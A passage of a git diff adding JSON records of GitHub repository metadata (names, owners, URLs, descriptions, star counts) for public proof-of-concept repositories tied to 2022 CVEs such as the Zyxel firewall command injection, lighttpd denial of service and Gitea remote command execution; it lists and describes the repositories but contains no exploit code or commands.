+ "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30510.json b/2022/CVE-2022-30510.json new file mode 100644 index 0000000000..567d7583ec --- /dev/null +++ b/2022/CVE-2022-30510.json @@ -0,0 +1,33 @@ +[ + { + "id": 496310557, + "name": "CVE-2022-30510", + "full_name": "bigzooooz\/CVE-2022-30510", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-30510", + "description": "School Dormitory Management System 1.0 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2022-05-25T16:32:18Z", + "updated_at": "2024-08-12T20:23:33Z", + "pushed_at": "2022-05-25T16:32:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30511.json b/2022/CVE-2022-30511.json new file mode 100644 index 0000000000..932aae1fcf --- /dev/null +++ b/2022/CVE-2022-30511.json @@ -0,0 +1,33 @@ +[ + { + "id": 496311392, + "name": "CVE-2022-30511", + "full_name": "bigzooooz\/CVE-2022-30511", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-30511", + "description": "School Dormitory Management System 1.0 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2022-05-25T16:35:06Z", + "updated_at": "2024-08-12T20:23:33Z", + "pushed_at": "2022-05-25T16:35:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30512.json b/2022/CVE-2022-30512.json new file mode 100644 index 0000000000..fe7cf88620 --- /dev/null +++ b/2022/CVE-2022-30512.json @@ -0,0 +1,33 @@ +[ + { + "id": 496307836, + "name": "CVE-2022-30512", + "full_name": "bigzooooz\/CVE-2022-30512", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-30512", + "description": "School Dormitory Management System 1.0 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2022-05-25T16:23:53Z", + "updated_at": "2024-08-12T20:23:33Z", + "pushed_at": "2022-05-25T16:27:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30513.json b/2022/CVE-2022-30513.json new file mode 100644 index 0000000000..e8dedd9691 --- /dev/null +++ b/2022/CVE-2022-30513.json @@ -0,0 +1,33 @@ +[ + { + "id": 496314993, + "name": "CVE-2022-30513", + "full_name": "bigzooooz\/CVE-2022-30513", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-30513", + "description": "School Dormitory Management System 1.0 - Reflected XSS", + "fork": false, + "created_at": "2022-05-25T16:46:09Z", + "updated_at": "2024-08-12T20:23:33Z", + "pushed_at": "2022-05-26T10:48:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30514.json b/2022/CVE-2022-30514.json new file mode 100644 index 0000000000..eff06e3d43 --- /dev/null +++ b/2022/CVE-2022-30514.json @@ -0,0 +1,33 @@ +[ + { + "id": 496313723, + "name": "CVE-2022-30514", + "full_name": "bigzooooz\/CVE-2022-30514", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-30514", + "description": "School Dormitory Management System 1.0 - Reflected XSS", + "fork": false, + "created_at": "2022-05-25T16:42:25Z", + "updated_at": "2024-08-12T20:23:33Z", + "pushed_at": "2022-05-25T16:43:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30524.json b/2022/CVE-2022-30524.json new file mode 100644 index 0000000000..426cda0713 --- /dev/null +++ b/2022/CVE-2022-30524.json @@ -0,0 +1,33 @@ +[ + { + "id": 599809675, + "name": "xpdf-docker", + "full_name": "rishvic\/xpdf-docker", + "owner": { + "login": "rishvic", + "id": 40887886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40887886?v=4", + "html_url": "https:\/\/github.com\/rishvic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rishvic\/xpdf-docker", + "description": "Docker images of Xpdf 4.04, vulnerable to CVE-2022-30524", + "fork": false, + "created_at": "2023-02-09T23:30:39Z", + "updated_at": "2024-06-20T09:09:42Z", + "pushed_at": "2023-02-10T01:23:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30525.json b/2022/CVE-2022-30525.json new file mode 100644 index 0000000000..186fadb694 --- /dev/null +++ b/2022/CVE-2022-30525.json @@ -0,0 +1,472 @@ +[ + { + "id": 490649255, + "name": "victorian_machinery", + "full_name": "jbaines-r7\/victorian_machinery", + "owner": { + "login": "jbaines-r7", + "id": 91965877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91965877?v=4", + "html_url": "https:\/\/github.com\/jbaines-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jbaines-r7\/victorian_machinery", + "description": "Proof of concept exploit for CVE-2022-30525 (Zxyel firewall command injection)", + "fork": false, + "created_at": "2022-05-10T10:31:19Z", + "updated_at": "2024-10-07T21:38:25Z", + "pushed_at": "2022-05-12T10:37:44Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-30525", + "exploit", + "poc", + "zyxel" + ], + "visibility": "public", + "forks": 15, + "watchers": 30, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 491880937, + "name": "CVE-2022-30525", + "full_name": "Henry4E36\/CVE-2022-30525", + "owner": { + "login": "Henry4E36", + "id": 41940481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4", + "html_url": "https:\/\/github.com\/Henry4E36", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Henry4E36\/CVE-2022-30525", + "description": "Zyxel 防火墙远程命令注入漏洞(CVE-2022-30525)", + "fork": false, + "created_at": "2022-05-13T12:03:28Z", + "updated_at": "2022-09-27T06:08:52Z", + "pushed_at": "2022-05-13T12:29:47Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 24, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 491898473, + "name": "CVE-2022-30525", + "full_name": "shuai06\/CVE-2022-30525", + "owner": { + "login": "shuai06", + "id": 39673856, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39673856?v=4", + "html_url": "https:\/\/github.com\/shuai06", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shuai06\/CVE-2022-30525", + "description": "Zyxel 防火墙远程命令注入漏洞(CVE-2022-30525)批量检测脚本", + "fork": false, + "created_at": "2022-05-13T12:58:43Z", + "updated_at": "2024-10-21T10:38:20Z", + "pushed_at": "2022-05-13T14:46:04Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 32, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 491998597, + "name": "CVE-2022-30525", + "full_name": "savior-only\/CVE-2022-30525", + "owner": { + "login": "savior-only", + "id": 69495405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69495405?v=4", + "html_url": "https:\/\/github.com\/savior-only", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/savior-only\/CVE-2022-30525", + "description": "Zyxel 防火墙未经身份验证的远程命令注入", + "fork": false, + "created_at": "2022-05-13T18:16:31Z", + "updated_at": "2023-06-14T05:55:50Z", + "pushed_at": "2022-05-14T04:45:38Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 492404562, + "name": "CVE-2022-30525", + "full_name": "M4fiaB0y\/CVE-2022-30525", + "owner": { + "login": "M4fiaB0y", + "id": 95071636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95071636?v=4", + "html_url": "https:\/\/github.com\/M4fiaB0y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M4fiaB0y\/CVE-2022-30525", + "description": "Zyxel Firewall Remote Command Injection Vulnerability (CVE-2022-30525) Batch Detection Script", + "fork": false, + "created_at": "2022-05-15T06:20:06Z", + "updated_at": "2024-08-12T20:23:17Z", + "pushed_at": "2022-05-15T07:31:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 492686283, + "name": "CVE-2022-30525", + "full_name": "k0sf\/CVE-2022-30525", + "owner": { + "login": "k0sf", + "id": 13890845, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13890845?v=4", + "html_url": "https:\/\/github.com\/k0sf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k0sf\/CVE-2022-30525", + "description": "CVE-2022-30525(Zxyel 防火墙命令注入)的概念证明漏洞利用", + "fork": false, + "created_at": "2022-05-16T04:45:43Z", + "updated_at": "2022-05-19T10:30:01Z", + "pushed_at": "2022-05-16T04:57:20Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 492763116, + "name": "CVE-2022-30525", + "full_name": "superzerosec\/CVE-2022-30525", + "owner": { + "login": "superzerosec", + "id": 57648217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57648217?v=4", + "html_url": "https:\/\/github.com\/superzerosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/superzerosec\/CVE-2022-30525", + "description": "CVE-2022-30525 POC exploit", + "fork": false, + "created_at": "2022-05-16T09:15:43Z", + "updated_at": "2022-05-24T05:41:44Z", + "pushed_at": "2022-05-17T23:42:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 493718813, + "name": "CVE-2022-30525-Reverse-Shell", + "full_name": "Chocapikk\/CVE-2022-30525-Reverse-Shell", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-30525-Reverse-Shell", + "description": "Simple python script to exploit CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection", + "fork": false, + "created_at": "2022-05-18T15:22:17Z", + "updated_at": "2024-08-12T20:23:21Z", + "pushed_at": "2022-05-19T11:29:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 494055901, + "name": "CVE-2022-30525", + "full_name": "160Team\/CVE-2022-30525", + "owner": { + "login": "160Team", + "id": 100503670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100503670?v=4", + "html_url": "https:\/\/github.com\/160Team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/160Team\/CVE-2022-30525", + "description": "CVE-2022-30525 Zyxel防火墙命令注入漏洞 POC&EXP", + "fork": false, + "created_at": "2022-05-19T12:09:42Z", + "updated_at": "2022-05-19T12:09:42Z", + "pushed_at": "2022-05-19T12:09:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 495497134, + "name": "cve-2022-30525", + "full_name": "iveresk\/cve-2022-30525", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/cve-2022-30525", + "description": "Initial POC for the CVE-2022-30525", + "fork": false, + "created_at": "2022-05-23T16:51:42Z", + "updated_at": "2023-01-26T17:52:33Z", + "pushed_at": "2022-05-24T15:06:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 497244309, + "name": "CVE-2022-30525", + "full_name": "west9b\/CVE-2022-30525", + "owner": { + "login": "west9b", + "id": 103512651, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103512651?v=4", + "html_url": "https:\/\/github.com\/west9b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/west9b\/CVE-2022-30525", + "description": "CVE-2022-30525 Zyxel 防火墙命令注入漏洞 POC&EXPC ", + "fork": false, + "created_at": "2022-05-28T07:19:31Z", + "updated_at": "2024-11-16T19:53:34Z", + "pushed_at": "2022-05-28T07:52:19Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 502704119, + "name": "CVE-2022-30525", + "full_name": "furkanzengin\/CVE-2022-30525", + "owner": { + "login": "furkanzengin", + "id": 58439534, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58439534?v=4", + "html_url": "https:\/\/github.com\/furkanzengin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/furkanzengin\/CVE-2022-30525", + "description": "A OS Command Injection Vulnerability in the CGI Program of Zyxel", + "fork": false, + "created_at": "2022-06-12T19:04:41Z", + "updated_at": "2022-11-30T20:16:19Z", + "pushed_at": "2022-06-12T19:27:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 503116476, + "name": "CVE-2022-30525", + "full_name": "ProngedFork\/CVE-2022-30525", + "owner": { + "login": "ProngedFork", + "id": 67598703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67598703?v=4", + "html_url": "https:\/\/github.com\/ProngedFork", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ProngedFork\/CVE-2022-30525", + "description": "CVE-2022-30525 POC", + "fork": false, + "created_at": "2022-06-13T21:11:54Z", + "updated_at": "2023-01-15T22:04:26Z", + "pushed_at": "2022-06-13T21:22:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 589325446, + "name": "CVE-2022-30525_check", + "full_name": "cbk914\/CVE-2022-30525_check", + "owner": { + "login": "cbk914", + "id": 2042196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2042196?v=4", + "html_url": "https:\/\/github.com\/cbk914", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cbk914\/CVE-2022-30525_check", + "description": null, + "fork": false, + "created_at": "2023-01-15T20:02:24Z", + "updated_at": "2023-01-19T23:43:16Z", + "pushed_at": "2023-01-15T20:06:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 763860214, + "name": "CVE-2022-30525_Exploit", + "full_name": "arajsingh-infosec\/CVE-2022-30525_Exploit", + "owner": { + "login": "arajsingh-infosec", + "id": 161408029, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161408029?v=4", + "html_url": "https:\/\/github.com\/arajsingh-infosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arajsingh-infosec\/CVE-2022-30525_Exploit", + "description": "Exploit for CVE-2022-30525", + "fork": false, + "created_at": "2024-02-27T03:31:37Z", + "updated_at": "2024-02-27T03:33:04Z", + "pushed_at": "2024-02-27T03:33:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30526.json b/2022/CVE-2022-30526.json new file mode 100644 index 0000000000..8cc0a9a959 --- /dev/null +++ b/2022/CVE-2022-30526.json @@ -0,0 +1,33 @@ +[ + { + "id": 531406394, + "name": "CVE-2022-30526", + "full_name": "greek0x0\/CVE-2022-30526", + "owner": { + "login": "greek0x0", + "id": 104328056, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104328056?v=4", + "html_url": "https:\/\/github.com\/greek0x0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/greek0x0\/CVE-2022-30526", + "description": "Metasploit exploit for CVE-2022-30526", + "fork": false, + "created_at": "2022-09-01T07:15:09Z", + "updated_at": "2022-09-23T16:43:50Z", + "pushed_at": "2022-09-01T07:16:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30591.json b/2022/CVE-2022-30591.json new file mode 100644 index 0000000000..48c4f0df40 --- /dev/null +++ b/2022/CVE-2022-30591.json @@ -0,0 +1,39 @@ +[ + { + "id": 509190703, + "name": "QUIC-attacks", + "full_name": "efchatz\/QUIC-attacks", + "owner": { + "login": "efchatz", + "id": 43434138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43434138?v=4", + "html_url": "https:\/\/github.com\/efchatz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/efchatz\/QUIC-attacks", + "description": "Attacks against QUIC (CVE-2022-30591)", + "fork": false, + "created_at": "2022-06-30T18:25:23Z", + "updated_at": "2024-11-15T04:16:53Z", + "pushed_at": "2022-12-31T01:55:15Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-30591", + "flooding", + "quic", + "slowloris", + "vulnerabilities" + ], + "visibility": "public", + "forks": 8, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30592.json b/2022/CVE-2022-30592.json new file mode 100644 index 0000000000..6d320ab251 --- /dev/null +++ b/2022/CVE-2022-30592.json @@ -0,0 +1,38 @@ +[ + { + "id": 521908781, + "name": "HTTP3-attacks", + "full_name": "efchatz\/HTTP3-attacks", + "owner": { + "login": "efchatz", + "id": 43434138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43434138?v=4", + "html_url": "https:\/\/github.com\/efchatz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/efchatz\/HTTP3-attacks", + "description": "HTTP3-attacks (CVE-2022-30592)", + "fork": false, + "created_at": "2022-08-06T09:57:43Z", + "updated_at": "2024-10-27T07:14:29Z", + "pushed_at": "2022-12-18T03:36:03Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-30592", + "exploits", + "http3", + "vulnerabilities" + ], + "visibility": "public", + "forks": 17, + "watchers": 75, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30594.json b/2022/CVE-2022-30594.json new file mode 100644 index 0000000000..a7f522095d --- /dev/null +++ b/2022/CVE-2022-30594.json @@ -0,0 +1,33 @@ +[ + { + "id": 510550256, + "name": "linux-4.19.72_CVE-2022-30594", + "full_name": "Lay0us\/linux-4.19.72_CVE-2022-30594", + "owner": { + "login": "Lay0us", + "id": 99304369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99304369?v=4", + "html_url": "https:\/\/github.com\/Lay0us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lay0us\/linux-4.19.72_CVE-2022-30594", + "description": null, + "fork": false, + "created_at": "2022-07-05T01:33:39Z", + "updated_at": "2023-11-02T04:02:24Z", + "pushed_at": "2022-07-04T10:18:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30600.json b/2022/CVE-2022-30600.json new file mode 100644 index 0000000000..64eaedfba9 --- /dev/null +++ b/2022/CVE-2022-30600.json @@ -0,0 +1,33 @@ +[ + { + "id": 544347009, + "name": "POC-CVE-2022-30600", + "full_name": "Boonjune\/POC-CVE-2022-30600", + "owner": { + "login": "Boonjune", + "id": 76243608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76243608?v=4", + "html_url": "https:\/\/github.com\/Boonjune", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Boonjune\/POC-CVE-2022-30600", + "description": "A proof of concept for CVE-2022-30600", + "fork": false, + "created_at": "2022-10-02T08:43:05Z", + "updated_at": "2023-04-18T11:42:05Z", + "pushed_at": "2022-10-24T09:58:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30778.json b/2022/CVE-2022-30778.json new file mode 100644 index 0000000000..0443e4fad2 --- /dev/null +++ b/2022/CVE-2022-30778.json @@ -0,0 +1,33 @@ +[ + { + "id": 495295120, + "name": "CVE-2022-30778", + "full_name": "kang8\/CVE-2022-30778", + "owner": { + "login": "kang8", + "id": 36906329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36906329?v=4", + "html_url": "https:\/\/github.com\/kang8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kang8\/CVE-2022-30778", + "description": "Case for CVE-2022-30778", + "fork": false, + "created_at": "2022-05-23T07:04:54Z", + "updated_at": "2023-05-08T10:39:43Z", + "pushed_at": "2022-08-23T01:11:15Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 23, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30780.json b/2022/CVE-2022-30780.json new file mode 100644 index 0000000000..58055ed541 --- /dev/null +++ b/2022/CVE-2022-30780.json @@ -0,0 +1,73 @@ +[ + { + "id": 493644479, + "name": "CVE-2022-30780-lighttpd-denial-of-service", + "full_name": "p0dalirius\/CVE-2022-30780-lighttpd-denial-of-service", + "owner": { + "login": "p0dalirius", + "id": 79218792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79218792?v=4", + "html_url": "https:\/\/github.com\/p0dalirius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0dalirius\/CVE-2022-30780-lighttpd-denial-of-service", + "description": "CVE-2022-30780 - lighttpd remote denial of service", + "fork": false, + "created_at": "2022-05-18T12:01:17Z", + "updated_at": "2024-08-12T20:23:21Z", + "pushed_at": "2024-03-16T08:26:24Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-30780", + "denial", + "exploit", + "lighttpd", + "pentest", + "remote", + "service" + ], + "visibility": "public", + "forks": 4, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 830533984, + "name": "CVE-2022-30780_Checker", + "full_name": "xiw1ll\/CVE-2022-30780_Checker", + "owner": { + "login": "xiw1ll", + "id": 69167284, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69167284?v=4", + "html_url": "https:\/\/github.com\/xiw1ll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiw1ll\/CVE-2022-30780_Checker", + "description": "Lighttpd CVE-2022-30780 checker", + "fork": false, + "created_at": "2024-07-18T13:09:44Z", + "updated_at": "2024-07-18T13:41:32Z", + "pushed_at": "2024-07-18T13:41:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30781.json b/2022/CVE-2022-30781.json new file mode 100644 index 0000000000..3af4759e36 --- /dev/null +++ b/2022/CVE-2022-30781.json @@ -0,0 +1,38 @@ +[ + { + "id": 494965568, + "name": "CVE-2022-30781", + "full_name": "wuhan005\/CVE-2022-30781", + "owner": { + "login": "wuhan005", + "id": 12731778, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12731778?v=4", + "html_url": "https:\/\/github.com\/wuhan005", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wuhan005\/CVE-2022-30781", + "description": "🍵 Gitea repository migration remote command execution exploit.", + "fork": false, + "created_at": "2022-05-22T05:15:58Z", + "updated_at": "2024-08-12T20:23:27Z", + "pushed_at": "2022-05-26T11:32:21Z", + "stargazers_count": 85, + "watchers_count": 85, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-30781", + "exploit", + "gitea" + ], + "visibility": "public", + "forks": 16, + "watchers": 85, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30887.json b/2022/CVE-2022-30887.json new file mode 100644 index 0000000000..f57f5d47f4 --- /dev/null +++ b/2022/CVE-2022-30887.json @@ -0,0 +1,33 @@ +[ + 